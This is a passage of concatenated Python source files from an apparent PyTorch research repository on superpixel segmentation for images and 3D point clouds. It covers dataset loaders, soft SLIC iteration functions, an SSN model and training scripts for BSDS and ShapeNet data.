color_transforms self.geo_transforms = geo_transforms def 
__getitem__(self, idx): idxx = self.index[idx] data = rgb2lab(plt.imread(os.path.join(self.data_dir,idxx))) data = data.astype(np.float32) label = np.loadtxt(os.path.join(self.gt_dir,idxx[:-4] + ".csv"), dtype=np.int64, delimiter=',') spix = np.loadtxt(os.path.join(self.spix_dir, idxx[:-4] + ".csv"), dtype=np.int64, delimiter=',') if self.color_transforms is not None: data = self.color_transforms(data) if self.geo_transforms is not None: data, label, spix = self.geo_transforms([data, label, spix]) label = convert_label(label) label = torch.from_numpy(label) data = (torch.from_numpy(data)).permute(2, 0, 1) spix = convert_spix(spix) spix = torch.from_numpy(spix) idxx = (self.index[idx])[:-4] return data, label.reshape(50, -1).float(), spix.reshape(200, -1).float(), idxx[:-4] def __len__(self): return len(self.index) ``` #### File: lib/dataset/shapenet.py ```python from torch.utils.data import Dataset from torch import Tensor import os import h5py import numpy as np from .pointcloud_io import read def getFiles_full(path, suffix): return [ os.path.join(root, file) for root, dirs, files in os.walk(path) for file in files if file.endswith(suffix) ] def getFiles(path, suffix): return [ file for root, dirs, files in os.walk(path) for file in files if file.endswith(suffix) ] def convert_label(label, num=20): onehot = np.zeros((num, label.shape[0])).astype(np.float32) ct = 0 for t in np.unique(label).tolist(): if ct >= num: break else: onehot[ct, :] = (label == t) ct = ct + 1 return onehot def getFiles_full(path, suffix): return [ os.path.join(root, file) for root, dirs, files in os.walk(path) for file in files if file.endswith(suffix) ] class shapenet(Dataset): """ shapenet dataset for Pytorch Dataloader\n too slow in init time,need another implemention Args: datafolder (string): folder containing shapenet result split (str, optional): options in train,test and val. Defaults to 'train'. """ def __init__(self, datafolder, split='train'): assert split in ['train', 'val', 'test'], "split not exist" filepath = os.path.join(datafolder, split) datalist = [] labelist = [] flist = getFiles_full(filepath, '.h5') for fname in flist: f = h5py.File(fname, 'r') datalist.append(np.array(f['data'])) labelist.append(np.array(f['pid'])) self.data = np.concatenate(datalist, axis=0).transpose(0, 2, 1) self.label = np.concatenate(labelist, axis=0) def __getitem__(self, idx): return Tensor(self.data[idx]), Tensor(convert_label( self.label[idx])), Tensor(self.label[idx]) def __len__(self): return len(self.data) class shapenet_inst(Dataset): """ shapenet dataset for Pytorch Dataloader\n too slow in init time,need another implemention Args: datafolder (string): folder containing shapenet result split (str, optional): options in train,test and val. Defaults to 'train'. 
""" def __init__(self, datafolder, split='train'): assert split in ['train', 'val', 'test'], "split not exist" filepath = os.path.join(datafolder, split) datalist = [] labelist = [] flist = getFiles_full(filepath, '.h5') for fname in flist: f = h5py.File(fname, 'r') datalist.append(np.array(f['data'])) labelist.append(np.array(f['pid'])) self.data = np.concatenate(datalist, axis=0).transpose(0, 2, 1) self.label = np.concatenate(labelist, axis=0) def __getitem__(self, idx): return Tensor(self.data[idx]), Tensor( convert_label(self.label[idx], num=20)), Tensor(self.label[idx]) def __len__(self): return len(self.data) class shapenet_spix(Dataset): def __init__(self, datafolder, split='train', onehot=True): assert split in ['train', 'val', 'test'], "split not exist" filepath = os.path.join(datafolder, split) datalist = [] labelist = [] spixlist = [] flist = getFiles_full(filepath, '.h5') for fname in flist: f = h5py.File( fname, 'r') datalist.append(np.array(f['data'])) labelist.append(np.array(f['label'])) spixlist.append(np.array(f['spix'])) self.data = np.concatenate(datalist, axis=0).transpose(0, 2, 1) self.label = np.concatenate(labelist, axis=0) self.spix = np.concatenate(spixlist, axis=0) self.onehot = onehot def __getitem__(self, idx): label = self.label[idx] spix = self.spix[idx] if self.onehot: label = convert_label(label) spix = convert_label(spix) return Tensor(self.data[idx]), Tensor(label), Tensor(spix), Tensor( self.label[idx]) def __len__(self): return len(self.data) class shapenet_cpt(Dataset): def __init__(self, filepath) -> None: super().__init__() f = h5py.File(filepath) self.data = np.array(f["data"]).transpose(0, 2, 1) def __getitem__(self, idx: int): return Tensor(self.data[idx]), Tensor(self.data[idx]), Tensor( self.data[idx]) def __len__(self) -> int: return len(self.data) class shapenet_man(Dataset): def __init__(self, filepath) -> None: super().__init__() self.filelist = getFiles_full(filepath, ".pcd") def __getitem__(self, idx: int): filename = self.filelist[idx] data = read(filename) Tdata = Tensor(data[:, :3].transpose()) return Tdata, Tdata, Tdata def __len__(self) -> int: return len(self.filelist) ``` #### File: lib/ssn/ssn.py ```python import math import torch from torch import softmax from torch.nn.functional import pairwise_distance from .util_funcs import knn_indices_func_cpu, knn_indices_func_gpu #for time count->>SSN python toooooooooo slow from time import time SoftSlicTime = {} # from .pair_wise_distance import PairwiseDistFunction # from ..utils.sparse_utils import naive_sparse_bmm # @torch.no_grad() # def get_abs_indices(init_label_map, num_spixels_width): # b, n_pixel = init_label_map.shape # device = init_label_map.device # r = torch.arange(-1, 2.0, device=device) # relative_spix_indices = torch.cat([r - num_spixels_width, r, r + num_spixels_width], 0) # abs_pix_indices = torch.arange(n_pixel, device=device)[None, None].repeat(b, 9, 1).reshape(-1).long() # abs_spix_indices = (init_label_map[:, None] + relative_spix_indices[None, :, None]).reshape(-1).long() # abs_batch_indices = torch.arange(b, device=device)[:, None, None].repeat(1, 9, n_pixel).reshape(-1).long() # return torch.stack([abs_batch_indices, abs_spix_indices, abs_pix_indices], 0) # @torch.no_grad() # def get_hard_abs_labels(affinity_matrix, init_label_map, num_spixels_width): # relative_label = affinity_matrix.max(1)[1] # r = torch.arange(-1, 2.0, device=affinity_matrix.device) # relative_spix_indices = torch.cat([r - num_spixels_width, r, r + num_spixels_width], 0) # label = 
init_label_map + relative_spix_indices[relative_label] # return label.long() # @torch.no_grad() # def sparse_ssn_iter(pixel_features, num_spixels, n_iter): # """ # computing assignment iterations with sparse matrix # detailed process is in Algorithm 1, line 2 - 6 # NOTE: this function does NOT guarantee the backward computation. # Args: # pixel_features: torch.Tensor # A Tensor of shape (B, C, H, W) # num_spixels: int # A number of superpixels # n_iter: int # A number of iterations # return_hard_label: bool # return hard assignment or not # """ # height, width = pixel_features.shape[-2:] # num_spixels_width = int(math.sqrt(num_spixels * width / height)) # num_spixels_height = int(math.sqrt(num_spixels * height / width)) # spixel_features, init_label_map = \ # calc_init_centroid(pixel_features, num_spixels_width, num_spixels_height) # abs_indices = get_abs_indices(init_label_map, num_spixels_width) # pixel_features = pixel_features.reshape(*pixel_features.shape[:2], -1) # permuted_pixel_features = pixel_features.permute(0, 2, 1) # for _ in range(n_iter): # dist_matrix = PairwiseDistFunction.apply( # pixel_features, spixel_features, init_label_map, num_spixels_width, num_spixels_height) # affinity_matrix = (-dist_matrix).softmax(1) # reshaped_affinity_matrix = affinity_matrix.reshape(-1) # mask = (abs_indices[1] >= 0) * (abs_indices[1] < num_spixels) # sparse_abs_affinity = torch.sparse_coo_tensor(abs_indices[:, mask], reshaped_affinity_matrix[mask]) # spixel_features = naive_sparse_bmm(sparse_abs_affinity, permuted_pixel_features) \ # / (torch.sparse.sum(sparse_abs_affinity, 2).to_dense()[..., None] + 1e-16) # spixel_features = spixel_features.permute(0, 2, 1) # hard_labels = get_hard_abs_labels(affinity_matrix, init_label_map, num_spixels_width) # return sparse_abs_affinity, hard_labels, spixel_features # def ssn_iter(pixel_features, num_spixels, n_iter): # """ # computing assignment iterations # detailed process is in Algorithm 1, line 2 - 6 # Args: # pixel_features: torch.Tensor # A Tensor of shape (B, C, H, W) # num_spixels: int # A number of superpixels # n_iter: int # A number of iterations # return_hard_label: bool # return hard assignment or not # """ # height, width = pixel_features.shape[-2:] # num_spixels_width = int(math.sqrt(num_spixels * width / height)) # num_spixels_height = int(math.sqrt(num_spixels * height / width)) # spixel_features, init_label_map = \ # calc_init_centroid(pixel_features, num_spixels_width, num_spixels_height) # abs_indices = get_abs_indices(init_label_map, num_spixels_width) # pixel_features = pixel_features.reshape(*pixel_features.shape[:2], -1) # permuted_pixel_features = pixel_features.permute(0, 2, 1).contiguous() # for _ in range(n_iter): # dist_matrix = PairwiseDistFunction.apply( # pixel_features, spixel_features, init_label_map, num_spixels_width, num_spixels_height) # affinity_matrix = (-dist_matrix).softmax(1) # reshaped_affinity_matrix = affinity_matrix.reshape(-1) # mask = (abs_indices[1] >= 0) * (abs_indices[1] < num_spixels) # sparse_abs_affinity = torch.sparse_coo_tensor(abs_indices[:, mask], reshaped_affinity_matrix[mask]) # abs_affinity = sparse_abs_affinity.to_dense().contiguous() # spixel_features = torch.bmm(abs_affinity, permuted_pixel_features) \ # / (abs_affinity.sum(2, keepdim=True) + 1e-16) # spixel_features = spixel_features.permute(0, 2, 1).contiguous() # hard_labels = get_hard_abs_labels(affinity_matrix, init_label_map, num_spixels_width) # return abs_affinity, hard_labels, spixel_features def soft_slic_all(point, seed, 
n_iter=10, k_faces=8): """ soft slic with all points entering computation Args: point (Tensor): import feature seed (Tensor): facet center n_iter (int, optional): number of ssn iter. Defaults to 10. k_facets (int, optional): Dummy API,never mind Returns: [type]: [description] """ for _ in range(n_iter): dist_matrix = point.new(point.shape[0], seed.shape[-1], point.shape[-1]).zero_() for i in range(seed.shape[-1]): initials = seed[:, :, i].unsqueeze(-1).repeat(1, 1, point.shape[-1]) dist_matrix[:, i, :] = -(pairwise_distance(point, initials) * pairwise_distance(point, initials)) QT = dist_matrix.softmax(1) seed = (torch.bmm(QT, point.permute(0, 2, 1)) / QT.sum(2, keepdim=True)).permute(0, 2, 1) _, hard_label = QT.permute(0, 2, 1).max(-1) return QT, hard_label, seed, point def soft_slic_knn(point, seed, n_iter=10, k_facets=8): """ soft slic with knn implemented by pytorch catch k adjacent spixs around selected center Args: point (Tensor): import feature seed (Tensor): facet center n_iter (int, optional): number of ssn iter. Defaults to 10. k_facets (int, optional): number of nearst facets knn chosed. Defaults to 4. """ def soft_slic_all_single(point, seed): dist_matrix = point.new(point.shape[0], seed.shape[-1], point.shape[-1]).zero_() for i in range(seed.shape[-1]): initials = seed[:, :, i].unsqueeze(-1).repeat(1, 1, point.shape[-1]) dist_matrix[:, i, :] = -(pairwise_distance(point, initials) * pairwise_distance(point, initials)) QT = dist_matrix.softmax(1) _, hard_label = QT.permute(0, 2, 1).max(-1) return hard_label B, C, N = point.shape #select knn functions if point.device == 'cpu': knn = knn_indices_func_cpu else: knn = knn_indices_func_gpu #calculate initial superpixels # traditional k-means based #print("knn slic start") hard_label = soft_slic_all_single(point, seed) for iter in range(n_iter): dist_matrix = point.new(point.shape[0], seed.shape[-1], point.shape[-1]).zero_() NearstFacetsIdx = knn(seed, seed, k_facets) #batchwise operation->fvck for batch_idx in range(B): for seed_i in range(seed.shape[-1]): mask = hard_label[batch_idx] == seed_i for _, nearst in enumerate(NearstFacetsIdx[batch_idx, seed_i]): mask |= hard_label[batch_idx] == nearst pointt = point[batch_idx, :, mask].permute(1, 0) seeed = seed[batch_idx, :, seed_i].unsqueeze(0).repeat(pointt.shape[0], 1) dist = pairwise_distance(pointt, seeed) Q_part = (-dist.pow(2)).softmax(-1) dist_matrix[batch_idx, seed_i, mask] = Q_part seed = (torch.bmm(dist_matrix, point.permute(0, 2, 1)) / dist_matrix.sum(2, keepdim=True)).permute(0, 2, 1) _, hard_label = dist_matrix.permute(0, 2, 1).max(-1) return dist_matrix, hard_label, seed, point def soft_slic_pknn(point, seed, n_iter=10, k_point=128): """ soft slic implemented using knn catch k adjacent pix around center Args: point (Tensor): point feature seed (Tensor): original spix center n_iter (int, optional): n slic iters . Defaults to 10. k_facets (int, optional): k nearst points. Defaults to 256. 
Returns: [type]: [description] """ B, C, N = point.shape #select knn functions if point.device == 'cpu': knn = knn_indices_func_cpu else: knn = knn_indices_func_gpu for _ in range(n_iter): dist_matrix = point.new(B, seed.shape[-1], point.shape[-1]).zero_() NearstFacetsIdx = knn(seed, point, k_point) # pointt = torch.stack([torch.stack([x[:, idxxx] for idxxx in idxx], dim=1) for idxx, x in zip(NearstFacetsIdx, point)]) pointt = torch.stack( [x[:, idxx] for idxx, x in zip(NearstFacetsIdx, point)]) # print(pointt.shape) packed_seed = seed.unsqueeze(-1).expand([-1, -1, -1, k_point]) dist = pairwise_distance(packed_seed, pointt) # print(dist.shape) QT_part = (-dist.pow(2)).softmax(-1) for i in range(dist_matrix.shape[0]): for j in range(dist_matrix.shape[1]): dist_matrix[i, j, NearstFacetsIdx[i, j]] = QT_part[i, j] seed = (torch.bmm(dist_matrix, point.permute(0, 2, 1)) / (dist_matrix.sum(2, keepdim=True) + 1e-16)).permute(0, 2, 1) _, hard_label = dist_matrix.permute(0, 2, 1).max(-1) return dist_matrix, hard_label, seed, point ``` #### File: aabbcco/ssn-3d-pytorch/model.py ```python import torch import torch.nn as nn from lib.ssn.ssn import ssn_iter, sparse_ssn_iter def conv_bn_relu(in_c, out_c): return nn.Sequential( nn.Conv2d(in_c, out_c, 3, padding=1, bias=False), nn.BatchNorm2d(out_c), nn.ReLU(True) ) class SSNModel(nn.Module): def __init__(self, feature_dim, nspix, n_iter=10): super().__init__() self.nspix = nspix self.n_iter = n_iter self.scale1 = nn.Sequential( conv_bn_relu(5, 64), conv_bn_relu(64, 64) ) self.scale2 = nn.Sequential( nn.MaxPool2d(3, 2, padding=1), conv_bn_relu(64, 64), conv_bn_relu(64, 64) ) self.scale3 = nn.Sequential( nn.MaxPool2d(3, 2, padding=1), conv_bn_relu(64, 64), conv_bn_relu(64, 64) ) self.output_conv = nn.Sequential( nn.Conv2d(64*3+5, feature_dim-5, 3, padding=1), nn.ReLU(True) ) for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.normal_(m.weight, 0, 0.001) if m.bias is not None: nn.init.constant_(m.bias, 0) def forward(self, x): pixel_f = self.feature_extract(x) if self.training: return ssn_iter(pixel_f, self.nspix, self.n_iter) else: return sparse_ssn_iter(pixel_f, self.nspix, self.n_iter) def feature_extract(self, x): s1 = self.scale1(x) s2 = self.scale2(s1) s3 = self.scale3(s2) s2 = nn.functional.interpolate(s2, size=s1.shape[-2:], mode="bilinear", align_corners=False) s3 = nn.functional.interpolate(s3, size=s1.shape[-2:], mode="bilinear", align_corners=False) cat_feat = torch.cat([x, s1, s2, s3], 1) feat = self.output_conv(cat_feat) return torch.cat([feat, x], 1) ``` #### File: ssn-3d-pytorch/trainfile/lmfeam_shapenet.py ```python import os import math import numpy as np import time import torch from torch.nn import Module import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter import sys sys.path.append(os.path.dirname("../")) from lib.utils.meter import Meter from lib.dataset import shapenet from lib.utils.pointcloud_io import CalAchievableSegAccSingle, CalUnderSegErrSingle from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse from lib.MEFEAM.MEFEAM import discriminative_loss, LMFEAM, sample_and_group_query_ball from lib.ssn.ssn import soft_slic_all, soft_slic_pknn class LMFEAM_SSN(Module): def __init__(self, feature_dim, nspix, mfem_dim=6, n_iter=10, RGB=False, normal=False, backend=soft_slic_all): super().__init__() self.nspix = nspix self.n_iter = n_iter self.channel = 3 self.backend = backend if RGB: self.channel += 3 if normal: self.channel += 3 #[32, 
64], [128, 128], [64, mfem_dim], 32,3 , [0.2, 0.4, 0.6] self.lmfeam = LMFEAM([32, 64], [128, 128], [64, mfem_dim], [128, 64, feature_dim], 32, self.channel, point_scale=[0.2, 0.4, 0.6], grouping=sample_and_group_query_ball) def forward(self, x): feature, msf = self.lmfeam(x) return self.backend(feature, feature[:, :, :self.nspix], self.n_iter), msf @torch.no_grad() def eval(model, loader, pos_scale, device): model.eval() # change the mode of model to eval sum_asa = 0 sum_usa = 0 cnt = 0 for data in loader: cnt += 1 inputs, labels, labels_num = data # b*c*npoint inputs = inputs.to(device) # b*c*w*h #labels = labels.to(device) # sematic_lable inputs = pos_scale * inputs # calculation,return affinity,hard lable,feature tensor (Q, H, _, _), msf_feature = model(inputs) H = H.squeeze(0).to("cpu").detach().numpy() labels_num = labels_num.squeeze(0).numpy() asa = CalAchievableSegAccSingle(H, labels_num) usa = CalUnderSegErrSingle(H, labels_num) sum_asa += asa sum_usa += usa if (100 == cnt): break model.train() asaa = sum_asa / 100.0 usaa = sum_usa / 100.0 strs = "[test]:asa: {:.5f},ue: {:.5f}".format(asaa, usaa) print(strs) return asaa, usaa # cal asa def update_param(data, model, optimizer, compactness, pos_scale, device, disc_loss): inputs, labels, labels_num = data inputs = inputs.to(device) labels = labels.to(device) inputs = pos_scale * inputs (Q, H, _, _), msf_feature = model(inputs) recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels) compact_loss = reconstruct_loss_with_mse(Q, inputs, H) disc = disc_loss(msf_feature, labels_num) #uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device) loss = recons_loss + compactness * compact_loss optimizer.zero_grad() # clear previous grad loss.backward() # cal the grad optimizer.step() # backprop return { "loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item(), "disc": disc.item() } def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = LMFEAM_SSN(10, 50, backend=soft_slic_pknn).to(device) disc_loss = discriminative_loss(0.1, 0.1) optimizer = optim.Adam(model.parameters(), cfg.lr) train_dataset = shapenet.shapenet(cfg.root) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) test_dataset = shapenet.shapenet(cfg.root, split="test") test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 writer = SummaryWriter(log_dir= cfg.out_dir, comment='traininglog') for epoch_idx in range(cfg.train_epoch): batch_iterations = 0 for data in train_loader: iterations += 1 batch_iterations+=1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.pos_scale, device, disc_loss) meter.add(metric) state = meter.state( f"[{batch_iterations},{epoch_idx}/{cfg.train_epoch}]") print(state) # return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item()} writer.add_scalar("comprehensive/loss", metric["loss"], iterations) writer.add_scalar("loss/reconstruction_loss", metric["reconstruction"], iterations) writer.add_scalar("loss/compact_loss", metric["compact"], iterations) writer.add_scalar("loss/disc_loss", metric["disc"], iterations) if (iterations % 200) == 0: (asa, usa) = eval(model, test_loader, cfg.pos_scale, device) writer.add_scalar("test/asa", asa, iterations) writer.add_scalar("test/ue", usa, iterations) if (iterations % 1000) == 0: strs = 
"ep_{:}_batch_{:}_iter_{:}_asa_{:.3f}_ue_{:.3f}.pth".format(epoch_idx,batch_iterations,iterations,asa,usa) torch.save( model.state_dict(), os.path.join( cfg.out_dir, strs)) unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../shapenet_part_seg_hdf5_data', help="/ path/to/shapenet") parser.add_argument("--out_dir", default="./log_lmnfeam_pknn_ndisc", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=16, type=int) parser.add_argument("--nworkers", default=8, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr", default=1e-6, type=float, help="learning rate") parser.add_argument("--train_epoch", default=30, type=int) parser.add_argument("--fdim", default=10, type=int, help="embedding dimension") parser.add_argument("--niter", default=5, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=100, type=int, help="number of superpixels") parser.add_argument("--pos_scale", default=10, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() os.makedirs(args.out_dir, exist_ok=True) train(args) ``` #### File: ssn-3d-pytorch/trainfile/mfeam_shapenet-spix-disc.py ```python import os import math import numpy as np import time import torch import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter import sys sys.path.append(os.path.dirname("../")) from lib.utils.meter import Meter from models.model_MNFEAM import MFEAM_SSN from lib.dataset.shapenet import shapenet_spix from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse, uniform_compact_loss from lib.MEFEAM.MEFEAM import discriminative_loss @torch.no_grad() def eval(model, loader, pos_scale, device): def achievable_segmentation_accuracy(superpixel, label): """ Function to calculate Achievable Segmentation Accuracy: ASA(S,G) = sum_j max_i |s_j \cap g_i| / sum_i |g_i| Args: input: superpixel image (H, W), output: ground-truth (H, W) """ TP = 0 unique_id = np.unique(superpixel) for uid in unique_id: mask = superpixel == uid label_hist = np.histogram(label[mask]) maximum_regionsize = label_hist[0].max() TP += maximum_regionsize return TP / label.size model.eval() # change the mode of model to eval sum_asa = 0 for data in loader: inputs, labels = data # b*c*npoint inputs = inputs.to(device) # b*c*w*h labels = labels.to(device) # sematic_lable inputs = pos_scale * inputs # calculation,return affinity,hard lable,feature tensor Q, H, feat = model(inputs) asa = achievable_segmentation_accuracy( H.to("cpu").detach().numpy(), labels.to("cpu").numpy()) # return data to cpu sum_asa += asa model.train() return sum_asa / len(loader) # cal asa def update_param(data, model, optimizer, compactness, pos_scale, device, disc_loss): inputs, labels, _, spix = data inputs = inputs.to(device) labels = labels.to(device) inputs = pos_scale * inputs (Q, H, _, _), msf_feature = model(inputs) recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels) compact_loss = reconstruct_loss_with_mse(Q, inputs, H) disc = disc_loss(msf_feature, spix) #uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device) loss = recons_loss + compactness * compact_loss 
+ disc optimizer.zero_grad() # clear previous grad loss.backward() # cal the grad optimizer.step() # backprop return { "loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item(), "disc": disc.item() } def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = MFEAM_SSN(10, 50).to(device) disc_loss = discriminative_loss(0.1, 0.5) optimizer = optim.Adam(model.parameters(), cfg.lr) train_dataset = shapenet_spix(cfg.root) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) # test_dataset = shapenet.shapenet(cfg.root, split="test") # test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 max_val_asa = 0 writer = SummaryWriter(log_dir='log', comment='traininglog') while iterations < cfg.train_iter: for data in train_loader: iterations += 1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.pos_scale, device, disc_loss) meter.add(metric) state = meter.state(f"[{iterations}/{cfg.train_iter}]") print(state) # return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item()} writer.add_scalar("comprehensive/loss", metric["loss"], iterations) writer.add_scalar("loss/reconstruction_loss", metric["reconstruction"], iterations) writer.add_scalar("loss/compact_loss", metric["compact"], iterations) writer.add_scalar("loss/disc_loss", metric["disc"], iterations) if (iterations % 1000) == 0: torch.save( model.state_dict(), os.path.join(cfg.out_dir, "model_iter" + str(iterations) + ".pth")) # if (iterations % cfg.test_interval) == 0: # asa = eval(model, test_loader, cfg.pos_scale, device) # print(f"validation asa {asa}") # writer.add_scalar("comprehensive/asa", asa, iterations) # if asa > max_val_asa: # max_val_asa = asa # torch.save(model.state_dict(), os.path.join( # cfg.out_dir, "bset_model_sp_loss.pth")) if iterations == cfg.train_iter: break unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../shapenet_partseg_spix', help="/ path/to/shapenet") parser.add_argument("--out_dir", default="./log", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=8, type=int) parser.add_argument("--nworkers", default=8, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr", default=1e-6, type=float, help="learning rate") parser.add_argument("--train_iter", default=10000, type=int) parser.add_argument("--fdim", default=10, type=int, help="embedding dimension") parser.add_argument("--niter", default=5, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=50, type=int, help="number of superpixels") parser.add_argument("--pos_scale", default=10, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() os.makedirs(args.out_dir, exist_ok=True) train(args) ``` #### File: ssn-3d-pytorch/trainfile/train_universe-mfa.py ```python import os import time import torch import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter import sys sys.path.append(os.path.dirname("../")) from lib.utils.meter import Meter from lib.ssn.ssn import soft_slic_pknn from lib.dataset 
import shapenet from lib.MEFEAM.MEFEAM import discriminative_loss from models.MFA_ptnet import * def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = MfaPtnetSsn(cfg.fdim, cfg.nspix, cfg.niter, backend=soft_slic_pknn).to(device) disc_loss = discriminative_loss(0.1, 0.5) optimizer = optim.Adam(model.parameters(), cfg.lr) train_dataset = shapenet.shapenet(cfg.root) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) test_dataset = shapenet.shapenet(cfg.root, split="test") test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 writer = SummaryWriter(log_dir=cfg.out_dir, comment='traininglog') for epoch_idx in range(cfg.train_epoch): batch_iterations = 0 for data in train_loader: batch_iterations += 1 iterations += 1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.pos_scale, device) meter.add(metric) state = meter.state( f"[{batch_iterations},{epoch_idx}/{cfg.train_epoch}]") print(state) addscaler(metric, writer, iterations) if (iterations % 200) == 0: test_res = eval(model, test_loader, cfg.pos_scale, device) addscaler(test_res, writer, iterations, True) if (iterations % 1000) == 0: (asa, usa) = test_res strs = "ep_{:}_batch_{:}_iter_{:}_asa_{:.3f}_ue_{:.3f}.pth".format( epoch_idx, batch_iterations, iterations, asa, usa) torch.save(model.state_dict(), os.path.join(cfg.out_dir, strs)) unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../shapenet_partseg_inst', help="/ path/to/shapenet") parser.add_argument("--out_dir", default="./log_mfa_inst", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=8, type=int) parser.add_argument("--nworkers", default=8, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr", default=1e-4, type=float, help="learning rate") parser.add_argument("--train_epoch", default=30, type=int) parser.add_argument("--fdim", default=10, type=int, help="embedding dimension") parser.add_argument("--niter", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=50, type=int, help="number of superpixels") parser.add_argument("--pos_scale", default=10, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() os.makedirs(args.out_dir, exist_ok=True) train(args) ``` #### File: aabbcco/ssn-3d-pytorch/train.py ```python import os, math import numpy as np import time import torch import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter from lib.utils.meter import Meter from model import SSNModel from lib.dataset import bsds, augmentation from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse,uniform_compact_loss @torch.no_grad() def eval(model, loader, color_scale, pos_scale, device): def achievable_segmentation_accuracy(superpixel, label): """ Function to calculate Achievable Segmentation Accuracy: ASA(S,G) = sum_j max_i |s_j \cap g_i| / sum_i |g_i| Args: input: superpixel image (H, W), output: ground-truth (H, W) """ TP = 0 unique_id = np.unique(superpixel) for uid in unique_id: mask = superpixel == uid label_hist = 
np.histogram(label[mask]) maximum_regionsize = label_hist[0].max() TP += maximum_regionsize return TP / label.size model.eval()#change the mode of model to eval sum_asa = 0 for data in loader: inputs, labels,_ = data#b*c*w*h inputs = inputs.to(device)#b*c*w*h labels = labels.to(device)#sematic_lable height, width = inputs.shape[-2:]#w*H nspix_per_axis = int(math.sqrt(model.nspix))#determine how much pix initiated in horizontal/vertical space pos_scale = pos_scale * max(nspix_per_axis / height, nspix_per_axis / width) #dont konw #add coords for each pixel,B*(C+2)*W*H coords = torch.stack(torch.meshgrid(torch.arange(height, device=device), torch.arange(width, device=device)), 0)#2*W*H? coords = coords[None].repeat(inputs.shape[0], 1, 1, 1).float()#whats the meaning of repeat?#B*2*W*H inputs = torch.cat([color_scale*inputs, pos_scale*coords], 1)#input data, B*(C+2(x,y))*W*H Q, H, feat = model(inputs)#calculation,return affinity,hard lable,feature tensor H = H.reshape(height, width) #B*(W*H)=>B*W*H labels = labels.argmax(1).reshape(height, width)#one hot to digit? asa = achievable_segmentation_accuracy(H.to("cpu").detach().numpy(), labels.to("cpu").numpy())#return data to cpu sum_asa += asa model.train() return sum_asa / len(loader) #cal asa def update_param(data, model, optimizer, compactness, color_scale, pos_scale, device): inputs, labels,_ = data inputs = inputs.to(device) labels = labels.to(device) height, width = inputs.shape[-2:] nspix_per_axis = int(math.sqrt(model.nspix))#determine the origion poisition of superpixel pos_scale = pos_scale * max(nspix_per_axis/height, nspix_per_axis/width) coords = torch.stack(torch.meshgrid(torch.arange(height, device=device), torch.arange(width, device=device)), 0) coords = coords[None].repeat(inputs.shape[0], 1, 1, 1).float() inputs = torch.cat([color_scale*inputs, pos_scale*coords], 1) Q, H, feat = model(inputs) recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels) compact_loss = reconstruct_loss_with_mse(Q, coords.reshape(*coords.shape[:2], -1), H) #uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device) loss = recons_loss + compactness * compact_loss optimizer.zero_grad()#clear previous grad loss.backward()#cal the grad optimizer.step()#backprop return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item()} def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = SSNModel(cfg.fdim, cfg.nspix, cfg.niter).to(device) optimizer = optim.Adam(model.parameters(), cfg.lr) augment = 